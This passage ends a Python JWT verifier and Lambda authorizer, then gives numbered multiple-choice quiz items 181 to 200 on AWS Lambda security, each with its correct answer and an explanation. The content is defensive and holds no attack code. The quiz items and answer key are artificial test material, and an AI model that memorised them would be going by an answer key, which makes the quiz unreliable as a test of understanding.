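    except TokenError:
        raise
    except (ValueError, TypeError) as exc:  # wrong segment count, bad base64, bad JSON
        raise TokenError("malformed token") from exc
    if not isinstance(header, dict) or not isinstance(claims, dict):
        raise TokenError("malformed token")
    if header.get("alg") != "HS256":
        raise TokenError("unexpected alg")
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)):
        raise TokenError("missing exp")
    if now > exp + leeway:
        raise TokenError("token expired")
    nbf = claims.get("nbf")
    if isinstance(nbf, (int, float)) and now < nbf - leeway:
        raise TokenError("token not yet valid")
    if claims.get("aud") != audience:
        raise TokenError("wrong audience")
    return claims


def authorizer_handler(event: dict, context=None, now: Optional[float] = None) -> dict:
    """HTTP API Lambda authorizer; header names arrive lower-cased from API Gateway."""
    auth = (event.get("headers") or {}).get("authorization", "")
    if not auth.lower().startswith("bearer "):
        return {"isAuthorized": False}
    try:
        claims = verify_hs256(auth[7:].strip(), SECRET, AUDIENCE, now=now)
    except TokenError as exc:
        print(f"token rejected: {exc}")  # log the reason, never the token itself
        return {"isAuthorized": False}   # client must re-authenticate
    return {"isAuthorized": True, "context": {"sub": str(claims.get("sub", ""))}}


if __name__ == "__main__":
    fresh = sign_hs256({"sub": "user-1", "aud": AUDIENCE, "exp": int(time.time()) + 300}, SECRET)
    print(authorizer_handler({"headers": {"authorization": "Bearer " + fresh}}))
```

Keep leeway to a few seconds at most; a large grace period is exactly the "allow expired tokens" behaviour the question rules out, and an authorizer result cache in API Gateway should never be longer than the remaining token lifetime.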
181. How does AWS Secrets Manager enhance AWS Lambda security?
A) It securely stores and rotates sensitive credentials used by Lambda functions
B) It increases function execution time
C) It allows plaintext storage of credentials
D) It prevents Lambda function cold starts
β
Answer: A) It securely stores and rotates sensitive credentials used by Lambda functions
π Explanation: Secrets Manager stores credentials encrypted with KMS, gates retrieval with IAM so that only the function's execution role can read a given secret, and can rotate them on a schedule through a rotation function. A leaked copy therefore has a short useful life, and the secret never sits in code or in the function configuration.
182. Why should AWS Lambda environment variables be encrypted?
A) To prevent credential exposure in case of a function compromise
B) To improve function execution speed
C) To reduce API Gateway latency
D) To allow unrestricted access
β
Answer: A) To prevent credential exposure in case of a function compromise
π Explanation: Environment variables may contain sensitive data, which should always be encrypted to prevent unauthorized access.
183. What risk arises from using AWS Lambda with an unsecured DynamoDB table?
A) Attackers can access, modify, or delete database records without authorization
B) AWS automatically restricts database access
C) Function execution becomes slower
D) API Gateway requests are blocked
β
Answer: A) Attackers can access, modify, or delete database records without authorization
π Explanation: Lambda functions should have restricted IAM permissions to DynamoDB to prevent unauthorized data access.
184. What should be done to prevent AWS Lambda from being exploited to send spam emails?
A) Restrict outbound email traffic using VPC security groups or SES policies
B) Increase Lambda execution timeout
C) Allow unrestricted access to email services
D) Disable logging for email functions
β
Answer: A) Restrict outbound email traffic using VPC security groups or SES policies
π Explanation: Attackers may exploit compromised Lambda functions to send spam emails; outbound traffic should be restricted.
185. Why is it important to rotate IAM credentials used by AWS Lambda?
A) To reduce the risk of long-lived credentials being compromised
B) To improve function execution time
C) To increase API Gateway performance
D) To disable Lambda execution logs
β
Answer: A) To reduce the risk of long-lived credentials being compromised
π Explanation: Lambda itself uses short-lived credentials from its execution role, which AWS rotates automatically, so no long-lived IAM access keys should be embedded in the function at all. Rotation matters for whatever long-lived secrets the function does hold, such as database passwords and third-party API keys kept in Secrets Manager: rotating them bounds how long a leaked copy stays usable.
186. How can AWS Lambda detect and block malicious payloads?
A) Use AWS WAF and input validation to filter malicious requests
B) Disable API Gateway logging
C) Increase Lambda function timeout
D) Store payloads in plaintext logs
β
Answer: A) Use AWS WAF and input validation to filter malicious requests
π Explanation: AWS WAF can detect and block malicious payloads before they reach Lambda, reducing security risks.
187. What security measure should be enforced for Lambda functions processing personally identifiable information (PII)?
A) Encrypt data at rest and in transit using AWS KMS
B) Allow public access to function logs
C) Store PII in plaintext inside function code
D) Increase function memory allocation
β
Answer: A) Encrypt data at rest and in transit using AWS KMS
π Explanation: Sensitive data, such as PII, should always be encrypted to prevent unauthorized access.
188. What risk arises from allowing cross-account access to AWS Lambda functions?
A) External AWS accounts could invoke the function without proper authorization
B) AWS automatically blocks unauthorized access
C) Lambda execution time is reduced
D) API Gateway latency is improved
β
Answer: A) External AWS accounts could invoke the function without proper authorization
π Explanation: Cross-account access should be explicitly defined to prevent unauthorized invocation of Lambda functions.
189. How can AWS Lambda logs be protected from unauthorized access?
A) Use IAM policies to restrict CloudWatch Logs access
B) Allow unrestricted access to logs
C) Store logs inside Lambda function environment variables
D) Disable logging for security reasons
β
Answer: A) Use IAM policies to restrict CloudWatch Logs access
π Explanation: IAM policies should be used to enforce least privilege access for CloudWatch Logs, preventing sensitive data leaks.
190. What is the purpose of enabling AWS X-Ray for AWS Lambda functions?
A) To trace request flows and detect performance or security anomalies
B) To increase function execution time
C) To disable API Gateway authentication
D) To store function credentials
β
Answer: A) To trace request flows and detect performance or security anomalies
π Explanation: AWS X-Ray provides tracing capabilities, helping detect security issues such as unexpected function behavior.
191. What is the impact of allowing AWS Lambda functions to assume roles dynamically?
A) It increases the risk of privilege escalation if role-switching is not controlled
B) It reduces function execution time
C) It improves API Gateway latency
D) It reduces AWS billing costs
β
Answer: A) It increases the risk of privilege escalation if role-switching is not controlled
π Explanation: If a Lambda function is allowed to assume multiple roles, attackers could exploit misconfigurations to escalate privileges.
192. How does AWS Shield Advanced enhance the security of AWS Lambda functions?
A) It provides advanced DDoS protection and anomaly detection
B) It speeds up function execution
C) It automatically patches Lambda functions
D) It increases API Gateway response time
β
Answer: A) It provides advanced DDoS protection and anomaly detection
π Explanation: AWS Shield Advanced attaches to edge and load-balancer resources such as CloudFront distributions, Route 53 hosted zones and Application Load Balancers rather than to a Lambda function itself; placing the API in front of the function behind a protected CloudFront distribution is how it shields the function from large-scale DDoS floods, with cost protection for the scaling those floods cause.
193. What is a security risk of using AWS Lambda functions to process unverified external data?
A) Potential execution of malicious code (Remote Code Execution – RCE)
B) Faster function execution
C) Reduced AWS logging
D) Increased API Gateway request speed
β
Answer: A) Potential execution of malicious code (Remote Code Execution – RCE)
π Explanation: Processing unverified external data can lead to RCE vulnerabilities if proper sanitization is not enforced.
194. Why is it important to set Lambda function concurrency limits?
A) To prevent excessive invocations leading to denial-of-service (DoS) risks
B) To increase AWS billing costs
C) To disable IAM authentication
D) To improve Lambda function memory allocation
β
Answer: A) To prevent excessive invocations leading to denial-of-service (DoS) risks
π Explanation: Unrestricted concurrency can allow attackers to spam function invocations, consuming resources uncontrollably.
195. How can AWS Lambda functions be protected from unauthorized state modifications?
A) Enable AWS Config to track configuration changes
B) Allow unrestricted write access
C) Increase function execution timeout
D) Store state data in plaintext logs
β
Answer: A) Enable AWS Config to track configuration changes
π Explanation: AWS Config records every configuration change to a function (code hash, execution role, environment variables, layers, concurrency, function URL settings) with a timeline, and Config rules can alert on drift from a known-good baseline; CloudTrail supplies the who and from where for each change.
196. What is a recommended method to prevent unauthorized database access from AWS Lambda?
A) Use IAM-based authentication and restrict database access with security groups
B) Allow all Lambda functions to access the database
C) Store database credentials in plaintext logs
D) Increase function memory allocation
β
Answer: A) Use IAM-based authentication and restrict database access with security groups
π Explanation: IAM authentication and security groups limit which functions can interact with databases, reducing the attack surface.
197. What is the risk of exposing AWS Lambda function metrics to unauthorized users?
A) Attackers can use the data to identify vulnerabilities and optimize attacks
B) It increases Lambda execution speed
C) AWS automatically prevents metric exposure
D) API Gateway request latency is reduced
β
Answer: A) Attackers can use the data to identify vulnerabilities and optimize attacks
π Explanation: CloudWatch metrics and logs are readable by any principal whose IAM policy allows it. Invocation counts, error rates, durations and throttles reveal which functions exist, how busy they are and when they fail, which helps an attacker time a denial of service or spot a function that crashes on particular input. Scope cloudwatch:GetMetricData and logs permissions to the people who need them.
198. How does AWS WAF help protect AWS Lambda functions?
A) It blocks malicious requests before they reach API Gateway
B) It increases function execution memory
C) It allows unrestricted API access
D) It automatically patches Lambda function dependencies
β
Answer: A) It blocks malicious requests before they reach API Gateway
π Explanation: AWS WAF filters out threats such as SQL injection, XSS, and bot-based attacks before they can reach Lambda functions.
199. What security measure helps protect AWS Lambda from supply chain attacks?
A) Use dependency scanning tools to check for vulnerable third-party packages
B) Store function dependencies inside plaintext logs
C) Allow Lambda functions to install dependencies dynamically
D) Disable logging for security reasons
β
Answer: A) Use dependency scanning tools to check for vulnerable third-party packages
π Explanation: Supply chain attacks often involve compromised third-party dependencies; scanning tools help detect vulnerabilities.
200. What is the best way to prevent an AWS Lambda function from making outbound requests to unauthorized domains?
A) Use VPC security groups and firewall rules to restrict outbound traffic
B) Allow unrestricted outbound access for flexibility
C) Increase Lambda function timeout
D) Store external endpoints in environment variables
β
Answer: A) Use VPC security groups and firewall rules to restrict outbound traffic
π Explanation: A function that is not attached to a VPC has full internet egress by default, so VPC attachment is the prerequisite. Inside the VPC, allow outbound traffic only to the destinations the function needs, using security-group egress rules for IP-level control and a filtering proxy or firewall in the egress path (for example AWS Network Firewall domain allow lists) for name-level control, so a compromised function cannot ship data to an attacker-controlled host.